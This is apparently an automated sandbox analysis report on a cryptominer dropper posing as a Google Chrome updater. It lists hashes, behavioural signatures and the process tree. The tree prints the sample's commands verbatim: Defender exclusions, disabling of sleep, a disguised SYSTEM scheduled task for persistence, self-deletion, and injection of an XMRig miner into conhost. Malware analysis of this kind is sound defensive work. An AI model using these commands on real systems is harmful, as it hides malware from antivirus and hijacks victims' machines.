Analysis
-
max time kernel
150s -
max time network
146s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
04-05-2023 01:21
Static task
static1
Behavioral task
behavioral1
Sample
setup.EXE.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
setup.EXE.exe
Resource
win10v2004-20230220-en
General
-
Target
setup.EXE.exe
-
Size
2.2MB
-
MD5
39e8e89d11f4c2beb1dc272240968ee2
-
SHA1
fcacd9e35b7f74165c7c85df55f413af3177c462
-
SHA256
975930a23c07c68020d761cbc929b9c5f8cc88c21ee69b5fd2b1c7b4940ae9b5
-
SHA512
6bd0ae070048b2ba0b3d448deac9f50edb87751f508fcfcb79be1511a9efe7d1836c4a08dad544bda61d709a7ac431c74025e3d0497541b76b3a623ec36ac566
-
SSDEEP
49152:HvQktXR6UE2TlbnUj5vKhCin0lJ1vBjE9+bnY0:PptgkUdvKA1pj1bn
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
description pid Process procid_target PID 1508 created 1264 1508 updater.exe 16 PID 1508 created 1264 1508 updater.exe 16 PID 1508 created 1264 1508 updater.exe 16 PID 1508 created 1264 1508 updater.exe 16 PID 1508 created 1264 1508 updater.exe 16 PID 1884 created 1264 1884 updater.exe 16 PID 1884 created 1264 1884 updater.exe 16 PID 1884 created 1264 1884 updater.exe 16 PID 1884 created 1264 1884 updater.exe 16 PID 460 created 1264 460 conhost.exe 16 PID 1884 created 1264 1884 updater.exe 16 -
XMRig Miner payload 14 IoCs
resource yara_rule behavioral1/memory/1164-112-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1164-114-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1164-116-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1164-117-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1164-119-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1164-121-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1164-123-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1164-125-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1164-127-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1164-129-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1164-131-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1164-133-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1164-135-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1164-137-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts updater.exe File created C:\Windows\System32\drivers\etc\hosts updater.exe -
Executes dropped EXE 2 IoCs
pid Process 1508 updater.exe 1884 updater.exe -
Loads dropped DLL 2 IoCs
pid Process 1708 setup.EXE.exe 1948 taskeng.exe -
resource yara_rule behavioral1/memory/1164-112-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1164-114-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1164-116-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1164-117-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1164-119-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1164-121-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1164-123-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1164-125-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1164-127-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1164-129-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1164-131-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1164-133-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1164-135-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1164-137-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce setup.EXE.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" setup.EXE.exe -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1884 set thread context of 460 1884 updater.exe 59 PID 1884 set thread context of 1164 1884 updater.exe 66 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe updater.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 628 schtasks.exe 764 schtasks.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 2068ee7f377ed901 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 1508 updater.exe 1508 updater.exe 1280 powershell.exe 1508 updater.exe 1508 updater.exe 1508 updater.exe 1508 updater.exe 1172 powershell.exe 1508 updater.exe 1508 updater.exe 1508 updater.exe 1508 updater.exe 1712 powershell.exe 1884 updater.exe 1884 updater.exe 876 powershell.exe 1884 updater.exe 1884 updater.exe 1884 updater.exe 1884 updater.exe 1100 powershell.exe 1884 updater.exe 1884 updater.exe 1884 updater.exe 1884 updater.exe 460 conhost.exe 460 conhost.exe 1884 updater.exe 1884 updater.exe -
Suspicious use of AdjustPrivilegeToken 38 IoCs
description pid Process Token: SeDebugPrivilege 1280 powershell.exe Token: SeShutdownPrivilege 1524 powercfg.exe Token: SeShutdownPrivilege 1244 powercfg.exe Token: SeShutdownPrivilege 904 powercfg.exe Token: SeShutdownPrivilege 1784 powercfg.exe Token: SeDebugPrivilege 1172 powershell.exe Token: SeDebugPrivilege 1712 powershell.exe Token: SeDebugPrivilege 876 powershell.exe Token: SeShutdownPrivilege 948 powercfg.exe Token: SeDebugPrivilege 1100 powershell.exe Token: SeShutdownPrivilege 920 powercfg.exe Token: SeShutdownPrivilege 1496 powercfg.exe Token: SeShutdownPrivilege 580 powercfg.exe Token: SeAssignPrimaryTokenPrivilege 1244 WMIC.exe Token: SeIncreaseQuotaPrivilege 1244 WMIC.exe Token: SeSecurityPrivilege 1244 WMIC.exe Token: SeTakeOwnershipPrivilege 1244 WMIC.exe Token: SeLoadDriverPrivilege 1244 WMIC.exe Token: SeSystemtimePrivilege 1244 WMIC.exe Token: SeBackupPrivilege 1244 WMIC.exe Token: SeRestorePrivilege 1244 WMIC.exe Token: SeShutdownPrivilege 1244 WMIC.exe Token: SeSystemEnvironmentPrivilege 1244 WMIC.exe Token: SeUndockPrivilege 1244 WMIC.exe Token: SeManageVolumePrivilege 1244 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1244 WMIC.exe Token: SeIncreaseQuotaPrivilege 1244 WMIC.exe Token: SeSecurityPrivilege 1244 WMIC.exe Token: SeTakeOwnershipPrivilege 1244 WMIC.exe Token: SeLoadDriverPrivilege 1244 WMIC.exe Token: SeSystemtimePrivilege 1244 WMIC.exe Token: SeBackupPrivilege 1244 WMIC.exe Token: SeRestorePrivilege 1244 WMIC.exe Token: SeShutdownPrivilege 1244 WMIC.exe Token: SeSystemEnvironmentPrivilege 1244 WMIC.exe Token: SeUndockPrivilege 1244 WMIC.exe Token: SeManageVolumePrivilege 1244 WMIC.exe Token: SeLockMemoryPrivilege 1164 conhost.exe -
Suspicious use of WriteProcessMemory 47 IoCs
description pid Process procid_target PID 1708 wrote to memory of 1508 1708 setup.EXE.exe 28 PID 1708 wrote to memory of 1508 1708 setup.EXE.exe 28 PID 1708 wrote to memory of 1508 1708 setup.EXE.exe 28 PID 516 wrote to memory of 1524 516 cmd.exe 35 PID 516 wrote to memory of 1524 516 cmd.exe 35 PID 516 wrote to memory of 1524 516 cmd.exe 35 PID 516 wrote to memory of 1244 516 cmd.exe 36 PID 516 wrote to memory of 1244 516 cmd.exe 36 PID 516 wrote to memory of 1244 516 cmd.exe 36 PID 516 wrote to memory of 904 516 cmd.exe 37 PID 516 wrote to memory of 904 516 cmd.exe 37 PID 516 wrote to memory of 904 516 cmd.exe 37 PID 516 wrote to memory of 1784 516 cmd.exe 38 PID 516 wrote to memory of 1784 516 cmd.exe 38 PID 516 wrote to memory of 1784 516 cmd.exe 38 PID 1172 wrote to memory of 764 1172 powershell.exe 39 PID 1172 wrote to memory of 764 1172 powershell.exe 39 PID 1172 wrote to memory of 764 1172 powershell.exe 39 PID 316 wrote to memory of 1080 316 cmd.exe 44 PID 316 wrote to memory of 1080 316 cmd.exe 44 PID 316 wrote to memory of 1080 316 cmd.exe 44 PID 1712 wrote to memory of 1996 1712 powershell.exe 45 PID 1712 wrote to memory of 1996 1712 powershell.exe 45 PID 1712 wrote to memory of 1996 1712 powershell.exe 45 PID 1948 wrote to memory of 1884 1948 taskeng.exe 47 PID 1948 wrote to memory of 1884 1948 taskeng.exe 47 PID 1948 wrote to memory of 1884 1948 taskeng.exe 47 PID 844 wrote to memory of 948 844 cmd.exe 54 PID 844 wrote to memory of 948 844 cmd.exe 54 PID 844 wrote to memory of 948 844 cmd.exe 54 PID 844 wrote to memory of 920 844 cmd.exe 55 PID 844 wrote to memory of 920 844 cmd.exe 55 PID 844 wrote to memory of 920 844 cmd.exe 55 PID 844 wrote to memory of 1496 844 cmd.exe 56 PID 844 wrote to memory of 1496 844 cmd.exe 56 PID 844 wrote to memory of 1496 844 cmd.exe 56 PID 844 wrote to memory of 580 844 cmd.exe 57 PID 844 wrote to memory of 580 844 cmd.exe 57 PID 844 wrote to memory of 580 844 cmd.exe 57 PID 1100 wrote to memory of 628 1100 powershell.exe 58 PID 1100 wrote to memory of 628 1100 powershell.exe 58 PID 1100 wrote to memory of 628 1100 powershell.exe 58 PID 1884 wrote to memory of 460 1884 updater.exe 59 PID 872 wrote to memory of 1244 872 cmd.exe 64 PID 872 wrote to memory of 1244 872 cmd.exe 64 PID 872 wrote to memory of 1244 872 cmd.exe 64 PID 1884 wrote to memory of 1164 1884 updater.exe 66 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1264
-
C:\Users\Admin\AppData\Local\Temp\setup.EXE.exe"C:\Users\Admin\AppData\Local\Temp\setup.EXE.exe"2⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updater.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updater.exe3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1508
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1280
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:516 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1524
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1244
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:904
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1784
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#eumzq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1172 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:764
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updater.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:316 -
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 33⤵PID:1080
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#orelnvz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:1996
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:876
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:844 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:948
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:920
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1496
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:580
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe mtyzmefaxy2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:460
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:872 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1244
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:272
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe ztfwjhqgydmzyhtd 6E3sjfZq2rJQaxvLPmXgsBL6xjjYguHWtOpZ+stIdvsjpN5Mqdy4DBfa6KATFfaKAZMaQXvC1KNgNaZfZM8HGxL4eRg92r0PLThD4RS2+rjexl8QEwIJ14M3prGAtbnGuOaajagFMdZbQlZnkX7LTpDvemLklFEEkDRpd0MRiQkmiCqDJT0ST70lpA0Ax7hpUE2veW9asGL77y/7F+zB5ZPVSaU34o+Lv5kWkDLeNK0cugkA6illux3T+/Sb2S0vZvaE26iVl31vXE4exJE+Ud35vD+X6VNNbq1oYojHEXzWw4GRTP3CD20YI3aKBJ8z/zhyAFcAcIv5y7wAjkLs3ZoC+4dl9lrkSMrjgiNC6QQDtYQHoCERfzJ58wLLRWfx2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1164
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {CA6A2BE8-471D-47F3-BCE9-49792FA15D64} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1884 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#eumzq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"4⤵
- Creates scheduled task(s)
PID:628
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.1MB
MD516ceeaa7a3236d2ac005df92c974ef91
SHA148b875f24b43ec64f3271a6989f6747dd4bbf2a8
SHA2568fe9e6d788994d51dec47aa936f234f779082431a6e9822b9956f57197abcef9
SHA5128b07b641128aa323c77055a968e60ca4d10931cad585363489d964b5abbb6d3a6ea179410a702f9515879c8ab229c074ff7895b60081d9f71780a66adc6805ed
-
Filesize
2.1MB
MD516ceeaa7a3236d2ac005df92c974ef91
SHA148b875f24b43ec64f3271a6989f6747dd4bbf2a8
SHA2568fe9e6d788994d51dec47aa936f234f779082431a6e9822b9956f57197abcef9
SHA5128b07b641128aa323c77055a968e60ca4d10931cad585363489d964b5abbb6d3a6ea179410a702f9515879c8ab229c074ff7895b60081d9f71780a66adc6805ed
-
Filesize
2.1MB
MD516ceeaa7a3236d2ac005df92c974ef91
SHA148b875f24b43ec64f3271a6989f6747dd4bbf2a8
SHA2568fe9e6d788994d51dec47aa936f234f779082431a6e9822b9956f57197abcef9
SHA5128b07b641128aa323c77055a968e60ca4d10931cad585363489d964b5abbb6d3a6ea179410a702f9515879c8ab229c074ff7895b60081d9f71780a66adc6805ed
-
Filesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
Filesize
2.1MB
MD516ceeaa7a3236d2ac005df92c974ef91
SHA148b875f24b43ec64f3271a6989f6747dd4bbf2a8
SHA2568fe9e6d788994d51dec47aa936f234f779082431a6e9822b9956f57197abcef9
SHA5128b07b641128aa323c77055a968e60ca4d10931cad585363489d964b5abbb6d3a6ea179410a702f9515879c8ab229c074ff7895b60081d9f71780a66adc6805ed
-
Filesize
2.1MB
MD516ceeaa7a3236d2ac005df92c974ef91
SHA148b875f24b43ec64f3271a6989f6747dd4bbf2a8
SHA2568fe9e6d788994d51dec47aa936f234f779082431a6e9822b9956f57197abcef9
SHA5128b07b641128aa323c77055a968e60ca4d10931cad585363489d964b5abbb6d3a6ea179410a702f9515879c8ab229c074ff7895b60081d9f71780a66adc6805ed
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD510bbf52abaec7c15a68184561b488c5d
SHA133ea83d3bb4292b84d882e4f52cda075db1d9f81
SHA2567faa8826e913a4db9565f47761733159464ff73aaf2dc9e2850a06b7991ffecc
SHA5120d9a6a9d15b39472d8abb9b21da2efbd10ce93a2d6f3668cb9f5e311cb7093a4099f1b55b92cc758f8e9a335fc733eff4c7af8268d8604f36111a4f1471c4ae4
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD510bbf52abaec7c15a68184561b488c5d
SHA133ea83d3bb4292b84d882e4f52cda075db1d9f81
SHA2567faa8826e913a4db9565f47761733159464ff73aaf2dc9e2850a06b7991ffecc
SHA5120d9a6a9d15b39472d8abb9b21da2efbd10ce93a2d6f3668cb9f5e311cb7093a4099f1b55b92cc758f8e9a335fc733eff4c7af8268d8604f36111a4f1471c4ae4
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZA0DAH2XNZUOJXE3A0T9.temp
Filesize7KB
MD510bbf52abaec7c15a68184561b488c5d
SHA133ea83d3bb4292b84d882e4f52cda075db1d9f81
SHA2567faa8826e913a4db9565f47761733159464ff73aaf2dc9e2850a06b7991ffecc
SHA5120d9a6a9d15b39472d8abb9b21da2efbd10ce93a2d6f3668cb9f5e311cb7093a4099f1b55b92cc758f8e9a335fc733eff4c7af8268d8604f36111a4f1471c4ae4
-
Filesize
2KB
MD52b19df2da3af86adf584efbddd0d31c0
SHA1f1738910789e169213611c033d83bc9577373686
SHA25658868a299c5cf1167ed3fbc570a449ecd696406410b24913ddbd0f06a32595bd
SHA5124a1831f42a486a0ad2deef3d348e7220209214699504e29fdfeb2a6f7f25ad1d353158cd05778f76ef755e77ccd94ce9b4a7504039e439e4e90fa7cde589daa6
-
Filesize
2.1MB
MD516ceeaa7a3236d2ac005df92c974ef91
SHA148b875f24b43ec64f3271a6989f6747dd4bbf2a8
SHA2568fe9e6d788994d51dec47aa936f234f779082431a6e9822b9956f57197abcef9
SHA5128b07b641128aa323c77055a968e60ca4d10931cad585363489d964b5abbb6d3a6ea179410a702f9515879c8ab229c074ff7895b60081d9f71780a66adc6805ed
-
Filesize
2.1MB
MD516ceeaa7a3236d2ac005df92c974ef91
SHA148b875f24b43ec64f3271a6989f6747dd4bbf2a8
SHA2568fe9e6d788994d51dec47aa936f234f779082431a6e9822b9956f57197abcef9
SHA5128b07b641128aa323c77055a968e60ca4d10931cad585363489d964b5abbb6d3a6ea179410a702f9515879c8ab229c074ff7895b60081d9f71780a66adc6805ed